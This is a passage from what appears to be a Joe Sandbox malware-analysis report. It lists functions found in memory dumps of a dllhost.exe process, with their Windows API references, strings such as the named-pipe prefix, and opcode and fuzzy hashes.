QueryPerformanceCounter.KERNEL32 ref: 000001EF094280E6

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 4168f6a4c05c25c8db0f6138d46df6acc356e05af9a767263abae54d9fde3fb6
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: CD111F3A710F8489EB00CB60E8553AC33A4F759768F488E39EE5D467A5EB78C1558340

Function 000001EF092227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EF092228CC
StrCpyW.SHLWAPI ref: 000001EF092228E5

Part of subcall function 000001EF09223F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0922272F), ref: 000001EF09223FA0

Strings

\\.\pipe\, xrefs: 000001EF092228D7

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 23c72c1b0932c7e07b4eb729c1317666a2be565756b75dd4da41afdf8b92b173
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 1B719F32214BC1A1EA38DF26D9443EE6796F3C5B84F58003AFD5957B8AEE36C602C740

Function 000001EF094227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EF094228CC
StrCpyW.SHLWAPI ref: 000001EF094228E5

Part of subcall function 000001EF09423F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0942272F), ref: 000001EF09423FA0

Strings

\\.\pipe\, xrefs: 000001EF094228D7

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 1cdc6b2adbaa6cd7323a3d8c14b8d44c548a8b2a60e81954b4876c5a575234cf
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: AA71843A214BC142E6789F66D9543EE6796F3C4BA4F88C13AFD1943B56FA76C602C700

Function 000001EF091F80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001EF091F80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001EF091F8162

Strings

csm, xrefs: 000001EF091F8149

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 58d9cfa9fd0ddf14d75cb983739d6678b2a770d95b2566fe483b48dd423ed6b2
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 25519132315A888ADB54DB19D464BAC3392E784B98F598279BE474778AF778D842C700

Function 000001EF091F9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001EF091F9BA7

Strings

MOC, xrefs: 000001EF091F9B6F
RCC, xrefs: 000001EF091F9B77

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 45b148d2c609bbb63c5f7e0a24d777843d6c58503c3874027890c79a40df8fe8
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 96617D32608BC881D7719F15E4507DEB7A1F7C5B98F184229EF9907B96EB78C191CB00

Function 000001EF092225DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EF092226C2
StrCpyW.SHLWAPI ref: 000001EF092226D9

Strings

\\.\pipe\, xrefs: 000001EF092226CD

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 591986cb316decfd99ed2824da0224bea9ae8463413b6547c740923684bbc05c
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 4451B1362087C1A1EA289E25E5543EE6792F3D5B80F5C403DED6943B9BFA3AC546CB40

Function 000001EF094225DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EF094226C2
StrCpyW.SHLWAPI ref: 000001EF094226D9

Strings

\\.\pipe\, xrefs: 000001EF094226CD

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 0ae70c098a1da78b72ac33f5c3cec00621859edcc6e268ae7c6a814d66a37c82
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 0E51D53A2087C141EA689E25E4543EE6652F7D4BA0F88C03DED6953B5BFABAC506C740

Function 000001EF09232660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001EF09232778
GetLastError.KERNEL32 ref: 000001EF0923279D

Strings

U, xrefs: 000001EF09232722

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 141714e3b0a11fd9c2b6280b145be3cceaf8cddddff2e656059df19d83014db4
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: A541C132625AC0C6E7108F25E4047DEA7A2F388784F88813AFE4D87759FB38C442CB40

Function 000001EF09432660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001EF09432778
GetLastError.KERNEL32 ref: 000001EF0943279D

Strings

U, xrefs: 000001EF09432722

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: edfc15c575706c56641c6c838389d7b332567c5652a90a1df61a2d0f09e42bbe
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 1441BF36625AC086E7108F65E4047DEB7A2F7887A4F88C129FE4D87799EB78C442CB40

Function 000001EF09229178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001EF092291C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001EF092287F7), ref: 000001EF09229209

Strings

csm, xrefs: 000001EF092291F6

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 540135ee005ba917dd06961022b9d0b4f5ffc2bdc7c95802cedbe49be851cd26
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 0A111936214B8082EB218F15E54429DB7E6F788B94F588228EE8D07B65EF78C592CB00

Function 000001EF09429178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001EF094291C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001EF094287F7), ref: 000001EF09429209

Strings

csm, xrefs: 000001EF094291F6

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: ce39ab34ac9c1788c70514cefc975d5f63b339473fbe2a0c137f1cd462f95933
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: DF111C36214BC082EB218B25E54429D77E6F788BA4F5CC228EE8D07755EF39C552CB00

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 000001EF09221D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF09221D69
HeapAlloc.KERNEL32 ref: 000001EF09221D77
GetProcessHeap.KERNEL32 ref: 000001EF09221D9C
HeapFree.KERNEL32 ref: 000001EF09221DAA

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 3a53f73d0336cdcec70c569ed367c9fec2be90cfc8e6ceb2b0d951ce42f530b4
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 2A118B35A05B8091EA14DF66E80469D67A2F7C8FC0F5C803CEE8E53726EF38D4528300

Function 000001EF09421D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF09421D69
HeapAlloc.KERNEL32 ref: 000001EF09421D77
GetProcessHeap.KERNEL32 ref: 000001EF09421D9C
HeapFree.KERNEL32 ref: 000001EF09421DAA

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: ae582b7fbfb18ca9f97503f5674d53d5567f65561dc9b84434775681c0a6666d
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: B9117939A15BC081EA14CB66E80429D67A2F7C8FE0F9CC028EE4E53726EE39D4428300

Function 000001EF09221264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF0922126A
HeapAlloc.KERNEL32 ref: 000001EF09221279
GetProcessHeap.KERNEL32 ref: 000001EF09221293
HeapAlloc.KERNEL32 ref: 000001EF092212A4

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: c3d820a82653094e69c49a9f0ed0bb4972f190c7295b98ec9ffd05dd74ab9977
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 63E06D316016449AE7148F62D80878D37E2FBC8F05F48C02CDD8D07351EF7D849A8740

Function 000001EF09421264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF0942126A
HeapAlloc.KERNEL32 ref: 000001EF09421279
GetProcessHeap.KERNEL32 ref: 000001EF09421293
HeapAlloc.KERNEL32 ref: 000001EF094212A4

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: a1f9912fca5d3fd98f07ce8d9caceea79556a9c45493ba9af824559331dc6bab
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 06E06D35A016849AEB148F62D80838D36E2FBC8F25F48C02CDD0D07351EF7D849A8740

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90

Function 000001EF09221000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF09221006
HeapAlloc.KERNEL32 ref: 000001EF09221015
GetProcessHeap.KERNEL32 ref: 000001EF09221028
HeapAlloc.KERNEL32 ref: 000001EF09221037

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 401999c3e36310e097f8c7c9d2a6ca30bee2b2509ba70df11d7523c685e1944c
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: E6E0E571611A44AAE7289B62D90869D77A2FB88B15F88C078ED4D07321FE7C849A9A10

Function 000001EF09421000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF09421006
HeapAlloc.KERNEL32 ref: 000001EF09421015
GetProcessHeap.KERNEL32 ref: 000001EF09421028
HeapAlloc.KERNEL32 ref: 000001EF09421037

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: b9756de02d6772dda66dcfeeef4bfb34adbf933ce8d1ddec5260dc544820a714
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: FEE0ED75A116849AEB189B62D90429D76A2FB88B25F48C038DD0907311FE78849A9610

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
